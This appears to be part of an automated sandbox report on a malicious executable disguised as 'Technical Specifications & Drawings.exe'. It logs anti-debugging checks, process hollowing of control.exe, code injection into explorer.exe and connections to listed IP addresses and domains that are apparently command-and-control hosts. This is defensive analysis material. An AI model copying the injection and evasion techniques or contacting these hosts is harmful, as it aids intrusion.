          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01834257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01858DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0182A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01823540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01853D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01826C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0187070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01870EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01870EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01870EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01861608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 109.234.162.62 80
          Source: C:\Windows\explorer.exeDomain query: www.mexc-event-partner.site
          Source: C:\Windows\explorer.exeDomain query: www.gzkanglongkeji.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.155.208.43 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.107.80 80
          Source: C:\Windows\explorer.exeNetwork Connect: 67.23.226.119 80
          Source: C:\Windows\explorer.exeDomain query: www.kirchhoff-darryl.com
          Source: C:\Windows\explorer.exeNetwork Connect: 67.223.117.72 80
          Source: C:\Windows\explorer.exeDomain query: www.boshi-eg.online
          Source: C:\Windows\explorer.exeDomain query: www.tomoptique.fr
          Source: C:\Windows\explorer.exeDomain query: www.esandcraic.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 1C0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeMemory written: C:\Users\user\Desktop\Technical Specifications & Drawings.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeThread register set: target process: 3968
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3968
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeProcess created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exe
          Source: explorer.exe, 00000005.00000000.320653170.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.265661607.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.365897983.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000005.00000000.329795271.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.302606541.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
